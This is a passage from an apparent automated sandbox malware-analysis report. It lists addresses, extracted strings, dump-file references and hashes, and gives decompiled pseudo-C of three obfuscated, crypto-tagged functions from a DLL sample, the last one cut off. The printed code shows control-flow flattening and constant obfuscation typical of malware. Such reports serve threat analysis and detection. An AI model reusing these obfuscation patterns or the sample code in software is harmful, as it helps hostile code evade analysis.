0x0087dd83
0x0087dd8b
0x0087dd93
0x0087dd98
0x0087dda4
0x0087dda9
0x0087ddaf
0x0087ddb7
0x0087ddbf
0x0087ddc8
0x0087ddcd
0x0087ddd3
0x0087ddd8
0x0087dde0
0x0087dde8
0x0087ddf0
0x0087ddf8
0x0087de00
0x0087de08
0x0087de14
0x0087de17
0x0087de1d
0x0087de2a
0x0087de38
0x0087de3b
0x0087de3f
0x0087de43
0x0087de4b
0x0087de58
0x0087de5c
0x0087de64
0x0087de6c
0x0087de74
0x0087de7c
0x0087de84
0x0087de8c
0x0087de94
0x0087de99
0x0087dea1
0x0087dea9
0x0087deb1
0x0087deb9
0x0087dec1
0x0087dec9
0x0087ded1
0x0087ded9
0x0087dede
0x0087dee6
0x0087def3
0x0087def7
0x0087deff
0x0087df07
0x0087df0f
0x0087df17
0x0087df1f
0x0087df27
0x0087df2f
0x0087df34
0x0087df3c
0x0087df49
0x0087df4d
0x0087df55
0x0087df5d
0x0087df62
0x0087df6a
0x0087df72
0x0087df7a
0x0087df82
0x0087df8a
0x0087df92
0x0087df9a
0x0087dfa2
0x0087dfa2
0x0087dfa4
0x0087dfa5
0x0087dfa5
0x0087dfaa
0x00000000
0x0087dfaa
0x0087dfb8
0x0087e0a0
0x0087e0a7
0x0087e0aa
0x0087e0ac
0x0087e0b4
0x00000000
0x0087dfbe
0x0087dfc4
0x0087e001
0x0087e00a
0x0087e00e
0x0087e065
0x0087e082
0x0087e085
0x0087e08a
0x0087e0d6
0x0087e0d8
0x0087e0dd
0x0087dfc6
0x0087dfcc
0x0087dffa
0x00000000
0x0087dfce
0x0087dfd4
0x0087dfda
0x0087dfe0
0x0087dfeb
0x0087dfe8
0x0087dfe8
0x0087dfe8
0x0087dff0
0x0087dff3
0x0087dfa5
0x00000000
0x0087dfa5
0x0087dfd4
0x0087dfcc
0x0087dfc4
0x00000000
0x0087dfb8
0x0087e0cd
0x0087e0d4
0x00000000
0x0087e0de
0x0087e0de
0x0087e0de
0x0087e0f1
0x0087e0f1
0x0087dfa5

Strings

.|8, xrefs: 0087DDB7
fH, xrefs: 0087DD3E
s~eP, xrefs: 0087DCFA
8+{, xrefs: 0087DF3C
H%, xrefs: 0087DCE2
41, xrefs: 0087DEA1
1, xrefs: 0087DD98

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: .|8$1$41$8+{$H%$fH$s~eP
API String ID: 0-3664284304
Opcode ID: 20b6e946272d5eefce4a4133bbd4117b7e26c8a49a6661db4c953eaa9f0236b7
Instruction ID: e7b5e278a10d3096dafe2bf44f2de3fb4708aae0c49b3a694367fad347ad6b29
Opcode Fuzzy Hash: 20b6e946272d5eefce4a4133bbd4117b7e26c8a49a6661db4c953eaa9f0236b7
Instruction Fuzzy Hash: 32B11E725087809FD368CF25D98A40BBBE2FBC5748F10891DF29A86264D7B9C949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0086670B, Relevance: 9.0, Strings: 7, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0086670B() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t233;
				signed int _t236;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t258;
				intOrPtr _t259;
				void* _t261;
				void* _t266;
				void* _t268;

				_v576 = 0x5c6bdc;
				_v572 = 0xae866a;
				_t259 = 0;
				_t261 = 0xb8e9ee3;
				_v568 = 0;
				_v612 = 0xec3aec;
				_t5 =  &_v612; // 0xec3aec
				_t241 = 0x62;
				_v612 =  *_t5 * 0x6c;
				_v612 = _v612 | 0xdabeec40;
				_v612 = _v612 ^ 0xfbbeff50;
				_v604 = 0x37b038;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x000001bc;
				_v624 = 0x7f5f56;
				_v624 = _v624 + 0xffff5a99;
				_v624 = _v624 << 4;
				_v624 = _v624 ^ 0x07eb9ef3;
				_v628 = 0x55d92;
				_v628 = _v628 >> 0x10;
				_v628 = _v628 ^ 0x0529ff2d;
				_v628 = _v628 ^ 0x052de72a;
				_v664 = 0x989cfa;
				_v664 = _v664 * 0x6a;
				_v664 = _v664 | 0x8da787ac;
				_v664 = _v664 + 0xffffc08b;
				_v664 = _v664 ^ 0xbfb72d66;
				_v672 = 0x5126c1;
				_v672 = _v672 << 0xa;
				_v672 = _v672 | 0x6300e881;
				_v672 = _v672 * 0x1d;
				_v672 = _v672 ^ 0xbca67a4e;
				_v636 = 0x3defe6;
				_t49 =  &_v636; // 0x3defe6
				_v636 =  *_t49 * 9;
				_t51 =  &_v636; // 0x3defe6
				_v636 =  *_t51 * 0x52;
				_v636 = _v636 ^ 0xb28641ab;
				_v632 = 0xea2077;
				_t56 =  &_v632; // 0xea2077
				_v632 =  *_t56 * 0x65;
				_v632 = _v632 << 2;
				_v632 = _v632 ^ 0x7174f9be;
				_v660 = 0x2cce37;
				_v660 = _v660 << 0xd;
				_v660 = _v660 / _t241;
				_v660 = _v660 << 4;
				_v660 = _v660 ^ 0x1917ca80;
				_v676 = 0x92ca3e;
				_t242 = 0x12;
				_v676 = _v676 * 0x4b;
				_v676 = _v676 << 0xf;
				_v676 = _v676 >> 2;
				_v676 = _v676 ^ 0x28034127;
				_v596 = 0xf7772a;
				_v596 = _v596 + 0xffff3df8;
				_v596 = _v596 ^ 0x00fc52ab;
				_v644 = 0x6698d1;
				_v644 = _v644 | 0xc199dbe0;
				_v644 = _v644 ^ 0xc1fcc133;
				_v592 = 0x7143e7;
				_v592 = _v592 >> 2;
				_v592 = _v592 ^ 0x0010b3e1;
				_v652 = 0x9a4189;
				_v652 = _v652 * 0x60;
				_v652 = _v652 / _t242;
				_v652 = _v652 ^ 0x033cbda1;
				_v668 = 0xc5fab;
				_v668 = _v668 << 0xb;
				_v668 = _v668 >> 9;
				_v668 = _v668 + 0x8f67;
				_v668 = _v668 ^ 0x0031c4ff;
				_v600 = 0x6e8ee8;
				_v600 = _v600 ^ 0x0d880c60;
				_v600 = _v600 ^ 0x0deba949;
				_v616 = 0xb65c97;
				_v616 = _v616 + 0xffff6050;
				_v616 = _v616 << 6;
				_v616 = _v616 ^ 0x2d666d98;
				_v640 = 0xcc6d21;
				_t243 = 0x1b;
				_v640 = _v640 / _t243;
				_v640 = _v640 >> 0xe;
				_v640 = _v640 ^ 0x000eaea1;
				_v680 = 0x87d5f6;
				_t244 = 0x76;
				_v680 = _v680 * 0x1f;
				_v680 = _v680 << 9;
				_v680 = _v680 + 0xffff990b;
				_v680 = _v680 ^ 0xe5dd4258;
				_v608 = 0xe96961;
				_v608 = _v608 | 0xb6f9188e;
				_v608 = _v608 ^ 0xb6fb8930;
				_v656 = 0xc61929;
				_v656 = _v656 >> 2;
				_v656 = _v656 + 0xcacc;
				_v656 = _v656 << 2;
				_v656 = _v656 ^ 0x00c38b27;
				_v648 = 0x21afdf;
				_v648 = _v648 + 0x614;
				_v648 = _v648 + 0x692f;
				_v648 = _v648 ^ 0x002627a2;
				_v620 = 0xc6d0;
				_v620 = _v620 + 0xee3f;
				_t240 = _v608;
				_v620 = _v620 / _t244;
				_v620 = _v620 ^ 0x0005d3ba;
				do {
					while(_t261 != 0x885c2e) {
						if(_t261 == 0x1fa5b7d) {
							_t244 = _v628;
							_t233 = E00880DB1(_t244,  &_v524, __eflags, _v664, _t244, _v672);
							_t268 = _t268 + 0xc;
							__eflags = _t233;
							if(__eflags != 0) {
								_t261 = 0x6c35f0b;
								continue;
							}
						} else {
							if(_t261 == 0x4edc737) {
								_push(_t244);
								_t236 = E0087DBC1(_t240, _v652,  &_v564, _t244, _v668, _v600, _v616);
								_t258 = _v680;
								_t244 = _v640;
								asm("sbb esi, esi");
								_t261 = ( ~_t236 & 0xfe84828b) + 0x203d9a3;
								E00881538(_t244, _t258, _t240);
								_t268 = _t268 + 0x1c;
								goto L14;
							} else {
								if(_t261 == 0x6c35f0b) {
									_t258 = _v636;
									_t244 =  &_v524;
									_t238 = E008845CA(_t244, _t258, _t244, _t244, _v632, _v660, _v676, _v612, _v596, _v644, _t259, _v592, _v624, _v604);
									_t240 = _t238;
									_t268 = _t268 + 0x30;
									__eflags = _t238 - 0xffffffff;
									if(__eflags != 0) {
										_t261 = 0x4edc737;
										continue;
									}
								} else {
									if(_t261 == 0x8f2e6fb) {
										_t239 = E00865477(_t244);
										_t266 = _v588 - _v548;
										asm("sbb ecx, [esp+0x9c]");
										__eflags = _v584 - _t258;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t259 = 1;
												__eflags = 1;
											} else {
												__eflags = _t266 - _t239;
												if(_t266 >= _t239) {
													goto L19;
												}
											}
										}
									} else {
										if(_t261 != 0xb8e9ee3) {
											goto L14;
										} else {
											_t261 = 0x1fa5b7d;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t259;
					}
					_t244 = _v608;
					E0087CA1F(_t244, _v656,  &_v588, _v648, _v620);
					_t268 = _t268 + 0xc;
					_t261 = 0x8f2e6fb;
					L14:
					__eflags = _t261 - 0x203d9a3;
				} while (__eflags != 0);
				goto L20;
			}

0x00866711
0x0086671b
0x00866727
0x00866729
0x0086672e
0x00866735
0x0086673d
0x00866744
0x00866747
0x0086674b
0x00866753
0x0086675b
0x00866763
0x00866768
0x00866770
0x00866778
0x00866780
0x00866785
0x0086678d
0x00866795
0x0086679a
0x008667a2
0x008667aa
0x008667b7
0x008667bb
0x008667c3
0x008667cb
0x008667d3
0x008667db
0x008667e0
0x008667ed
0x008667f1
0x008667f9
0x00866801
0x00866806
0x0086680a
0x0086680f
0x00866813
0x0086681b
0x00866823
0x00866828
0x0086682c
0x00866831
0x00866839
0x00866841
0x0086684e
0x00866852
0x00866857
0x0086685f
0x0086686c
0x0086686d
0x00866871
0x00866876
0x0086687b
0x00866883
0x0086688b
0x00866893
0x0086689b
0x008668a3
0x008668ab
0x008668b3
0x008668bb
0x008668c0
0x008668c8
0x008668d5
0x008668df
0x008668e5
0x008668f2
0x008668fa
0x008668ff
0x00866904
0x0086690c
0x00866914
0x0086691c
0x00866924
0x0086692c
0x00866934
0x0086693c
0x00866941
0x00866949
0x00866957
0x0086695c
0x00866962
0x00866967
0x0086696f
0x0086697c
0x0086697d
0x00866981
0x00866986
0x0086698e
0x00866996
0x0086699e
0x008669a6
0x008669ae
0x008669b6
0x008669bb
0x008669c3
0x008669c8
0x008669d0
0x008669d8
0x008669e0
0x008669e8
0x008669f0
0x008669f8
0x00866a06
0x00866a0a
0x00866a0e
0x00866a16
0x00866a16
0x00866a24
0x00866afb
0x00866aff
0x00866b04
0x00866b07
0x00866b09
0x00866b0b
0x00000000
0x00866b0b
0x00866a2a
0x00866a30
0x00866aa5
0x00866ac1
0x00866ac6
0x00866acc
0x00866ad3
0x00866adb
0x00866ae1
0x00866ae6
0x00000000
0x00866a32
0x00866a38
0x00866a7b
0x00866a81
0x00866a88
0x00866a8d
0x00866a8f
0x00866a92
0x00866a95
0x00866a9b
0x00000000
0x00866a9b
0x00866a3a
0x00866a40
0x00866b45
0x00866b4e
0x00866b59
0x00866b60
0x00866b62
0x00866b64
0x00866b6a
0x00866b6c
0x00866b6c
0x00866b66
0x00866b66
0x00866b68
0x00000000
0x00000000
0x00866b68
0x00866b64
0x00866a46
0x00866a4c
0x00000000
0x00866a52
0x00866a52
0x00000000
0x00866a52
0x00866a4c
0x00866a40
0x00866a38
0x00866a30
0x00866b6d
0x00866b79
0x00866b79
0x00866b25
0x00866b2a
0x00866b2f
0x00866b32
0x00866b37
0x00866b37
0x00866b37
0x00000000

Strings

:, xrefs: 0086673D
ai, xrefs: 00866996
=, xrefs: 00866801
/i, xrefs: 008669E0
?, xrefs: 008669F8
w , xrefs: 00866823
Cq, xrefs: 008668B3

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /i$?$ai$w $:$Cq$=
API String ID: 0-170593755
Opcode ID: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction ID: 9a4f4b8074d472b84d244974ccd9c0031029fbf6333a9355c61534ef5f4cadc5
Opcode Fuzzy Hash: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction Fuzzy Hash: A0B110728083809FC368CF65C58A90BFBE1FBC5758F108A1DF5A9A6220D3B59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00874A66, Relevance: 7.8, Strings: 6, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00874A66() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				void* _t271;
				void* _t272;
				intOrPtr _t277;
				intOrPtr _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t289;
				intOrPtr _t294;
				intOrPtr _t311;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr _t325;
				signed int* _t327;
				void* _t330;

				_t327 =  &_v640;
				_v532 = 0x9eda53;
				_v528 = 0x2697e4;
				_t289 = 0xd8634eb;
				_t325 = 0;
				_v524 = 0;
				_v580 = 0x257a8f;
				_v580 = _v580 + 0xffff0a69;
				_t317 = 0x46;
				_v580 = _v580 / _t317;
				_v580 = _v580 ^ 0x00008592;
				_v556 = 0x213626;
				_t16 =  &_v556; // 0x213626
				_t318 = 0x3f;
				_v556 =  *_t16 * 0x37;
				_v556 = _v556 ^ 0x0722a203;
				_v564 = 0xc854a8;
				_v564 = _v564 >> 0xd;
				_v564 = _v564 ^ 0x000f067d;
				_v568 = 0x3071d1;
				_v568 = _v568 + 0xffff48c8;
				_v568 = _v568 ^ 0x002621f6;
				_v548 = 0x47fca2;
				_v548 = _v548 ^ 0x7cca96d7;
				_v548 = _v548 ^ 0x7c82555f;
				_v624 = 0xc0bc8e;
				_v624 = _v624 | 0x773eab6a;
				_v624 = _v624 + 0x32c;
				_v624 = _v624 + 0xe315;
				_v624 = _v624 ^ 0x77fb7a9a;
				_v544 = 0x592636;
				_v544 = _v544 << 0xb;
				_v544 = _v544 ^ 0xc9333252;
				_v572 = 0x38b1a;
				_v572 = _v572 ^ 0xe2d962db;
				_v572 = _v572 ^ 0xe2dfc1be;
				_v592 = 0x205e14;
				_v592 = _v592 + 0xffffa7ef;
				_v592 = _v592 + 0xffff7efd;
				_v592 = _v592 ^ 0x001a340d;
				_v540 = 0xa56fb;
				_v540 = _v540 ^ 0x6fafefe0;
				_v540 = _v540 ^ 0x6fae5e5f;
				_v616 = 0x18df03;
				_v616 = _v616 >> 6;
				_v616 = _v616 + 0x4bd4;
				_v616 = _v616 * 0xb;
				_v616 = _v616 ^ 0x000ee45e;
				_v632 = 0xf97e7d;
				_v632 = _v632 >> 0xe;
				_v632 = _v632 << 1;
				_v632 = _v632 >> 8;
				_v632 = _v632 ^ 0x0007c205;
				_v588 = 0x1ac705;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 | 0x5b484d5d;
				_v588 = _v588 ^ 0x5b49b1bf;
				_v608 = 0xcfa712;
				_v608 = _v608 << 0xb;
				_v608 = _v608 + 0xffff02b3;
				_v608 = _v608 / _t318;
				_v608 = _v608 ^ 0x01ff3be8;
				_v600 = 0x40b8c7;
				_v600 = _v600 >> 0xe;
				_v600 = _v600 + 0xffff3f18;
				_v600 = _v600 ^ 0xffff31b4;
				_v560 = 0xb86873;
				_v560 = _v560 * 0x79;
				_v560 = _v560 ^ 0x572fdc31;
				_v596 = 0x3e642a;
				_t319 = 0x51;
				_v596 = _v596 / _t319;
				_t320 = 0x15;
				_v596 = _v596 / _t320;
				_v596 = _v596 ^ 0x00087e57;
				_v636 = 0x2d2a20;
				_t132 =  &_v636; // 0x2d2a20
				_t321 = 0x64;
				_v636 =  *_t132 * 0x60;
				_v636 = _v636 + 0xd33d;
				_v636 = _v636 << 5;
				_v636 = _v636 ^ 0x1e1aa121;
				_v640 = 0xb10dcc;
				_v640 = _v640 | 0xc382035c;
				_v640 = _v640 << 7;
				_v640 = _v640 | 0x409aa621;
				_v640 = _v640 ^ 0xd99a11e4;
				_v584 = 0xf23298;
				_v584 = _v584 / _t321;
				_v584 = _v584 << 0xa;
				_v584 = _v584 ^ 0x09bffa87;
				_v620 = 0xffd84f;
				_v620 = _v620 + 0x561c;
				_v620 = _v620 + 0x86f;
				_v620 = _v620 ^ 0xc18b30ac;
				_v620 = _v620 ^ 0xc08b73c8;
				_v628 = 0x373ddb;
				_v628 = _v628 | 0x384c5e9f;
				_v628 = _v628 >> 0xc;
				_v628 = _v628 + 0xc32f;
				_v628 = _v628 ^ 0x000038bb;
				_v604 = 0xfde248;
				_v604 = _v604 + 0xffff394c;
				_t322 = 0x71;
				_v604 = _v604 * 0xa;
				_v604 = _v604 ^ 0x90dc5ac9;
				_v604 = _v604 ^ 0x99310c60;
				_v576 = 0xeb2acc;
				_v576 = _v576 / _t322;
				_v576 = _v576 >> 0xf;
				_v576 = _v576 ^ 0x000b47a1;
				_v612 = 0xe0e237;
				_t199 =  &_v612; // 0xe0e237
				_t323 = 0x22;
				_v612 =  *_t199 * 0x63;
				_v612 = _v612 << 0xf;
				_v612 = _v612 + 0xffff9396;
				_v612 = _v612 ^ 0xbdacf125;
				_v552 = 0xa3e3d4;
				_t324 = _v536;
				_v552 = _v552 / _t323;
				_v552 = _v552 ^ 0x00068221;
				goto L1;
				do {
					while(1) {
						L1:
						_t330 = _t289 - 0xa9836df;
						if(_t330 > 0) {
							break;
						}
						if(_t330 == 0) {
							E00863046(_v616, _v632, _v588, _t324, _v608);
							_t327 =  &(_t327[3]);
							L12:
							_t289 = 0xc26911c;
							continue;
						}
						if(_t289 == 0x7276a71) {
							_v536 = _v580;
							goto L12;
						}
						if(_t289 == 0x85778ce) {
							E008707F4();
							_t289 = 0x9029ee2;
							continue;
						}
						if(_t289 == 0x9029ee2) {
							E00880DB1(_v584,  &_v520, __eflags, _v620, _t289, _v628);
							_t283 = E0086EFE1(_v576, _v612, _v552,  &_v520);
							_t294 =  *0x886214; // 0x0
							 *((intOrPtr*)(_t294 + 4)) = _t283;
							L23:
							return _t325;
						}
						if(_t289 != 0x9959e7d) {
							goto L20;
						}
						_t285 = E0087E8B6(_t289, _v572, _v592, _t289, _v564, _v540);
						_t324 = _t285;
						_t327 =  &(_t327[4]);
						if(_t285 == 0) {
							_t289 = 0x7276a71;
						} else {
							_t287 =  *0x886214; // 0x0
							 *((intOrPtr*)(_t287 + 0x20)) = 1;
							_t289 = 0xdb6aac8;
						}
					}
					__eflags = _t289 - 0xc26911c;
					if(_t289 == 0xc26911c) {
						_t311 =  *0x886214; // 0x0
						_t271 = E00861A34(_v600, _t311 + 0x34, _t289, _t289, _v560, _v596, _v636, _t289, _v536, _v640);
						_t327 =  &(_t327[8]);
						_t289 = 0x85778ce;
						__eflags = _t271;
						_t272 = 1;
						_t325 =  ==  ? _t272 : _t325;
						goto L20;
					}
					__eflags = _t289 - 0xd8634eb;
					if(_t289 == 0xd8634eb) {
						_push(_t289);
						_push(_t289);
						_t277 = E0086C5D8(0x444);
						_t327 =  &(_t327[3]);
						 *0x886214 = _t277;
						_t289 = 0x9959e7d;
						goto L1;
					}
					__eflags = _t289 - 0xdb6aac8;
					if(__eflags != 0) {
						goto L20;
					}
					_t289 = 0xa9836df;
					_v536 = _v556;
					goto L1;
					L20:
					__eflags = _t289 - 0xdb6d293;
				} while (__eflags != 0);
				goto L23;
			}

0x00874a66
0x00874a6c
0x00874a76
0x00874a7e
0x00874a86
0x00874a88
0x00874a8f
0x00874a97
0x00874aa6
0x00874aab
0x00874ab1
0x00874ab9
0x00874ac1
0x00874ac6
0x00874ac7
0x00874acb
0x00874ad3
0x00874adb
0x00874ae0
0x00874ae8
0x00874af0
0x00874af8
0x00874b00
0x00874b08
0x00874b10
0x00874b18
0x00874b20
0x00874b28
0x00874b30
0x00874b38
0x00874b40
0x00874b48
0x00874b4d
0x00874b55
0x00874b5d
0x00874b65
0x00874b6d
0x00874b75
0x00874b7d
0x00874b85
0x00874b8d
0x00874b95
0x00874b9d
0x00874ba5
0x00874bad
0x00874bb2
0x00874bbf
0x00874bc3
0x00874bcb
0x00874bd3
0x00874bd8
0x00874bdc
0x00874be1
0x00874be9
0x00874bf1
0x00874bf6
0x00874bfe
0x00874c06
0x00874c0e
0x00874c13
0x00874c21
0x00874c25
0x00874c2d
0x00874c35
0x00874c3a
0x00874c42
0x00874c4a
0x00874c57
0x00874c5b
0x00874c65
0x00874c7d
0x00874c82
0x00874c8c
0x00874c91
0x00874c97
0x00874c9f
0x00874ca7
0x00874cac
0x00874caf
0x00874cb3
0x00874cbb
0x00874cc0
0x00874cc8
0x00874cd0
0x00874cd8
0x00874cdd
0x00874ce5
0x00874ced
0x00874cfd
0x00874d01
0x00874d06
0x00874d0e
0x00874d16
0x00874d1e
0x00874d26
0x00874d2e
0x00874d36
0x00874d3e
0x00874d46
0x00874d4b
0x00874d53
0x00874d5b
0x00874d63
0x00874d70
0x00874d73
0x00874d77
0x00874d7f
0x00874d87
0x00874d97
0x00874d9b
0x00874da0
0x00874da8
0x00874db0
0x00874db5
0x00874db6
0x00874dba
0x00874dbf
0x00874dc7
0x00874dcf
0x00874ddd
0x00874de1
0x00874de5
0x00874de5
0x00874ded
0x00874ded
0x00874ded
0x00874ded
0x00874def
0x00000000
0x00000000
0x00874df5
0x00874e83
0x00874e88
0x00874e6b
0x00874e6b
0x00000000
0x00874e6b
0x00874dfd
0x00874e67
0x00000000
0x00874e67
0x00874e05
0x00874e57
0x00874e5c
0x00000000
0x00874e5c
0x00874e0d
0x00874f39
0x00874f56
0x00874f5b
0x00874f64
0x00874f68
0x00874f73
0x00874f73
0x00874e19
0x00000000
0x00000000
0x00874e30
0x00874e35
0x00874e37
0x00874e3c
0x00874e50
0x00874e3e
0x00874e3e
0x00874e46
0x00874e49
0x00874e49
0x00874e3c
0x00874e8d
0x00874e8f
0x00874ef3
0x00874f02
0x00874f07
0x00874f0a
0x00874f0f
0x00874f13
0x00874f14
0x00000000
0x00874f14
0x00874e91
0x00874e97
0x00874ec0
0x00874ec1
0x00874ec7
0x00874ecc
0x00874ecf
0x00874ed4
0x00000000
0x00874ed4
0x00874e99
0x00874e9f
0x00000000
0x00000000
0x00874ea5
0x00874ea7
0x00000000
0x00874f17
0x00874f17
0x00874f17
0x00000000

Strings

&6!, xrefs: 00874AC1
]MH[, xrefs: 00874BF6
7, xrefs: 00874DB0
*-, xrefs: 00874CA7
*d>, xrefs: 00874C65
6&Y, xrefs: 00874B40

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: *-$&6!$*d>$6&Y$7$]MH[
API String ID: 0-1885758756
Opcode ID: 10bb469f6608cfdf135b1f618d1d94d2e5bc214a62c147fad22bb91fdaf4504b
Instruction ID: 9403775d1d6a2be3dde2bba0435d2e239bdf36a72d0deccef33c8079008a323e
Opcode Fuzzy Hash: 10bb469f6608cfdf135b1f618d1d94d2e5bc214a62c147fad22bb91fdaf4504b
Instruction Fuzzy Hash: 69D110B15083809BD368CF65D48981BFBE1FBD4758F208A1DF29686260D7B5C949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0087CCD9, Relevance: 7.7, Strings: 6, Instructions: 227
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E0087CCD9(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				void* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t282;
				void* _t283;
				signed int _t285;
				signed int* _t287;
				signed int* _t288;

				_t287 =  &_v100;
				_v4 = _v4 & 0x00000000;
				_v8 = 0x71e8b0;
				_v36 = 0x18cf5b;
				_v36 = _v36 + 0x6698;
				_v36 = _v36 ^ 0x001a117a;
				_v60 = 0xa2890;
				_t282 = __edx;
				_t248 = __ecx;
				_t283 = 0x72ed85;
				_t250 = 0x42;
				_v60 = _v60 / _t250;
				_v60 = _v60 ^ 0xe73bacde;
				_v60 = _v60 ^ 0xe73fbe74;
				_v40 = 0x9c8291;
				_t251 = 0x70;
				_v40 = _v40 / _t251;
				_v40 = _v40 ^ 0x000cc374;
				_v64 = 0xa8df6e;
				_t252 = 0x66;
				_v64 = _v64 * 0x5a;
				_v64 = _v64 | 0x6df616d5;
				_v64 = _v64 ^ 0x7ff9e958;
				_v88 = 0xc174cb;
				_v88 = _v88 ^ 0xe7b64a13;
				_v88 = _v88 ^ 0xc84137a7;
				_v88 = _v88 << 0xc;
				_v88 = _v88 ^ 0x60915aca;
				_v32 = 0x752193;
				_v32 = _v32 * 0x3f;
				_v32 = _v32 ^ 0x1cda7702;
				_v92 = 0x141833;
				_v92 = _v92 + 0xffffc8f8;
				_v92 = _v92 + 0xf362;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0xd48431d2;
				_v96 = 0xc34044;
				_v96 = _v96 << 8;
				_v96 = _v96 + 0xffff536d;
				_v96 = _v96 + 0x5d23;
				_v96 = _v96 ^ 0xc334c852;
				_v20 = 0x3a6348;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x6343ca6d;
				_v56 = 0x49cd71;
				_v56 = _v56 ^ 0x72d9145f;
				_v56 = _v56 + 0x4f98;
				_v56 = _v56 ^ 0x7290366b;
				_v24 = 0x3bf83a;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x77f6a760;
				_v28 = 0x632842;
				_v28 = _v28 + 0xffffe69b;
				_v28 = _v28 ^ 0x006ee443;
				_v48 = 0x4b2ed5;
				_v48 = _v48 ^ 0x82c7a85b;
				_v48 = _v48 + 0xffff7c4b;
				_v48 = _v48 ^ 0x8282f052;
				_v52 = 0x4c7b52;
				_v52 = _v52 + 0xffffbc1f;
				_v52 = _v52 + 0x2e12;
				_v52 = _v52 ^ 0x004752b1;
				_v16 = 0x3a13fc;
				_v16 = _v16 / _t252;
				_v16 = _v16 ^ 0x00081e0d;
				_v84 = 0x8573c6;
				_t253 = 0x4b;
				_v84 = _v84 / _t253;
				_v84 = _v84 | 0x42242f90;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x00008b33;
				_v100 = 0x3509ce;
				_t254 = 0x19;
				_v100 = _v100 / _t254;
				_t285 = 0x44;
				_t255 = 0x6f;
				_v100 = _v100 * 0x31;
				_v100 = _v100 + 0x6b64;
				_v100 = _v100 ^ 0x006714bf;
				_v68 = 0x65eeb7;
				_v68 = _v68 + 0x24bd;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x330bb4b3;
				_v72 = 0x31388d;
				_v72 = _v72 * 0x77;
				_v72 = _v72 / _t285;
				_v72 = _v72 ^ 0x00560572;
				_v76 = 0x10ecc2;
				_v76 = _v76 | 0x28471304;
				_v76 = _v76 + 0xcdda;
				_v76 = _v76 ^ 0x285661a5;
				_v44 = 0xf32c83;
				_v44 = _v44 / _t255;
				_v44 = _v44 / _t285;
				_v44 = _v44 ^ 0x000ff213;
				_v80 = 0xb9f4a0;
				_v80 = _v80 << 0xa;
				_v80 = _v80 + 0xd38f;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00ede5ae;
				_v12 = 0x138f30;
